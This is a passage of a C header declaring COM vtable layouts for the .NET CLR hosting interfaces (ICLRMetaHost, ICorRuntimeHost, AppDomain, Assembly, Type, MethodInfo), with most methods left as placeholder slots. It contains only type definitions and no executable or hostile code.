81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
